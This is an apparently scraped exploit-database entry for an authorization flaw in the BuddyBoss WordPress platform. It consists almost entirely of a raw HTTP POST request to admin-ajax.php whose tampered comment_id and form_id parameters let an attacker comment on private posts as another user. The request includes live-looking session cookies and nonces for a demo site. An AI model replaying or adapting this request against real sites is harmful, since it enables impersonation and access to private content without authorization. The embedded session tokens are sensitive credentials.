Share
## https://sploitus.com/exploit?id=WPEX-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8
POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=

The vulnerability was identified in the comment_id and form_id parameters which allowed private post to be commented as another user.